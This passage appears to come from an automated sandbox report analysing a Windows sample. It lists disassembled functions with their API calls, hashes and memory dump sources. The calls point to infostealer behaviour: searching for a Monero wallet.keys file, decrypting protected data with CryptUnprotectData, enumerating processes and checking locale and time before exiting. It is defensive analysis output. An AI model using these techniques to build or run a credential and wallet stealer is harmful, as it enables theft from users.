                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: '{F$+Nw$34gv$Jc~$MS.I$bP~_$dtM~$6}
                          • API String ID: 0-1837467796
                          • Opcode ID: 06efa043235126c68abad3efc69ac66f3546f530a67530b19618790c55a9f0a0
                          • Instruction ID: f4cff5ffa0104f93d145adc5dc308a5ce51dbcec8fed81adabc2d1a2d98bf999
                          • Opcode Fuzzy Hash: 06efa043235126c68abad3efc69ac66f3546f530a67530b19618790c55a9f0a0
                          • Instruction Fuzzy Hash: EDB217F360C2049FE3046E29EC8567AFBE9EFD4320F1A893DE6C583744E67558058796
                          Function 00177B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          • GetKeyboardLayoutList.USER32(00000000,00000000,001805AF), ref: 00177BE1
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00177BF9
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00177C0D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00177C62
                          • LocalFree.KERNEL32(00000000), ref: 00177D22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: 42667d083985f1fd3c80a88da5996c9cee8ccff6df2c2aa2a8b9cb7c237524c8
                          • Instruction ID: 84bb8e11dfb60a791d9d0b0677cd0b84efe9556f03cc601089ee7fd0d162fa9e
                          • Opcode Fuzzy Hash: 42667d083985f1fd3c80a88da5996c9cee8ccff6df2c2aa2a8b9cb7c237524c8
                          • Instruction Fuzzy Hash: DC413D71940218ABDB24DB94DC99FEEB778FF58700F608199E10DA6191DB342F85CFA2
                          Function 0016E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00180D73), ref: 0016E4A2
                          • StrCmpCA.SHLWAPI(?,001814F8), ref: 0016E4F2
                          • StrCmpCA.SHLWAPI(?,001814FC), ref: 0016E508
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0016EBDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: 66b1ed18e1a79b5e594b3391a8b91ab8ed11ae139ec16f30388173f70c3fe1c7
                          • Instruction ID: ab496e38fb26cb66e20d2b91b7a3b0e90d6cc296e402691ed2b3acbaf0cb4512
                          • Opcode Fuzzy Hash: 66b1ed18e1a79b5e594b3391a8b91ab8ed11ae139ec16f30388173f70c3fe1c7
                          • Instruction Fuzzy Hash: 111215729101189ADB19FB70DC96EEE7378AFA4301FC085A9B51E96091EF305F49CF92
                          Function 005238B2 Relevance: 7.9, Strings: 5, Instructions: 1611COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ]w$pl7${2k/${2k/$?
                          • API String ID: 0-878772045
                          • Opcode ID: 0d66f3566d604ce6fcf612012f3e3c5bd5041c8d6b193407446db66682c5a068
                          • Instruction ID: 59183061bd5fe48ce1b0470886dcf364240099a505123049a8dea330613ffb28
                          • Opcode Fuzzy Hash: 0d66f3566d604ce6fcf612012f3e3c5bd5041c8d6b193407446db66682c5a068
                          • Instruction Fuzzy Hash: C4B2F7F360C200AFE704AE2DEC8567ABBE9EF94720F1A493DE6C4C3744E63558458697
                          Function 0016C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0016C871
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0016C87C
                          • lstrcat.KERNEL32(?,00180B46), ref: 0016C943
                          • lstrcat.KERNEL32(?,00180B47), ref: 0016C957
                          • lstrcat.KERNEL32(?,00180B4E), ref: 0016C978
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: faacd605f62d96ffec04f19c1138deb377415d679c6172e68c45c8bb64faf03f
                          • Instruction ID: 40f91728d8a2119c75807efea6cfa0940fb7038c30586c834df03ae7813c59d5
                          • Opcode Fuzzy Hash: faacd605f62d96ffec04f19c1138deb377415d679c6172e68c45c8bb64faf03f
                          • Instruction Fuzzy Hash: D6418DB590421EDBDB10DFA0DD89BFEB7B8BB48304F1041A8E509A7280D7745B84CF92
                          Function 00176920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 0017696C
                          • sscanf.NTDLL ref: 00176999
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001769B2
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001769C0
                          • ExitProcess.KERNEL32 ref: 001769DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          • Opcode ID: a555f768a7ff21229f2b8798eeec7a9fb90c64d2bc68733047f0839b61d42dc9
                          • Instruction ID: 688bfcc258011a0e92db8565618b3bfd24df5892d7b3bb089a3e75fc325db410
                          • Opcode Fuzzy Hash: a555f768a7ff21229f2b8798eeec7a9fb90c64d2bc68733047f0839b61d42dc9
                          • Instruction Fuzzy Hash: F021CB76D14208AFCF49EFE4D9459EEB7B9BF48300F04852AE51AE3250EB345609CBA5
                          Function 00167240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0016724D
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00167254
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00167281
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 001672A4
                          • LocalFree.KERNEL32(?), ref: 001672AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: 04b54ac22889a0d0cbba2f2f9f2305c8a11190000e1426ed6b79d3d355fe074a
                          • Instruction ID: 99006f38669f4d6804e0f6289bb420e3f0146ea16f08eee7896719f647897800
                          • Opcode Fuzzy Hash: 04b54ac22889a0d0cbba2f2f9f2305c8a11190000e1426ed6b79d3d355fe074a
                          • Instruction Fuzzy Hash: 580100B5A40208BBDB15DFD4CD49F9E77BCAB44B04F104158FB05AA2C0D774AA00CB65
                          Function 00179600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0017961E
                          • Process32First.KERNEL32(00180ACA,00000128), ref: 00179632
                          • Process32Next.KERNEL32(00180ACA,00000128), ref: 00179647
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 0017965C
                          • CloseHandle.KERNEL32(00180ACA), ref: 0017967A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: dc3fea168cf91789667ac39a40bf700d38224130103cbb28d722156665928a55
                          • Instruction ID: 9e9039e9f870b28f28182393c3066cc2e9fb64b91025fb275ccc70fbd88ce2bd
                          • Opcode Fuzzy Hash: dc3fea168cf91789667ac39a40bf700d38224130103cbb28d722156665928a55
                          • Instruction Fuzzy Hash: 69011EB5A00208EBCB15DFA5CD48BEEBBFCEB48300F108288B90A97240E7359B44DF51
                          Function 0053297F Relevance: 6.7, Strings: 4, Instructions: 1655COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !;}w$Min=$r6}V$|5*
                          • API String ID: 0-17906166
                          • Opcode ID: 36c081c81837eaf4adb91964779debd31f70e605c38083418bf14cc1d4e579d2
                          • Instruction ID: 2fbc8b033b813ac0a73d37b6454cb33f48e1c7fbaf628cb5802cdde71693664d
                          • Opcode Fuzzy Hash: 36c081c81837eaf4adb91964779debd31f70e605c38083418bf14cc1d4e579d2
                          • Instruction Fuzzy Hash: 76B217F36086049FE304AE2DDC8567ABBE6EF94320F1A893DE6C4C7744EA3558058797
                          Function 00178EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,00165184,40000001,00000000,00000000,?,00165184), ref: 00178EC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          • Opcode ID: 40e93ef621739de374ad56d3322bd024f1e12d51ed1db93277ac3804e279aa46
                          • Instruction ID: fc7a1a2cacbb337666f140cba2a2a3bd182579fb4228c231dd9d91d40a26ac7b
                          • Opcode Fuzzy Hash: 40e93ef621739de374ad56d3322bd024f1e12d51ed1db93277ac3804e279aa46
                          • Instruction Fuzzy Hash: F7110071244609AFDB04CFA4E888FAA37BAAF8A714F10D548F9198B250DB35E941DB60
                          Function 00169AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00164EEE,00000000,00000000), ref: 00169AEF
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00164EEE,00000000,?), ref: 00169B01
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00164EEE,00000000,00000000), ref: 00169B2A
                          • LocalFree.KERNEL32(?,?,?,?,00164EEE,00000000,?), ref: 00169B3F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: db0209c9641044c2b9e764a0ff9d48af9b098226adf8104a25002c2567e7df28
                          • Instruction ID: cc686b35cf8dfd0e6c523ffa5683db343cb6b02d71a89e3d06f2ec5dace8afb6
                          • Opcode Fuzzy Hash: db0209c9641044c2b9e764a0ff9d48af9b098226adf8104a25002c2567e7df28
                          • Instruction Fuzzy Hash: 8311A4B4241208AFEB11CF64DC95FAA77B9FB89B10F208058F9159B394C775A901DB50
                          Function 00177A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00CCF1A0,00000000,?,00180E10,00000000,?,00000000,00000000), ref: 00177A63
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00177A6A
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00CCF1A0,00000000,?,00180E10,00000000,?,00000000,00000000,?), ref: 00177A7D
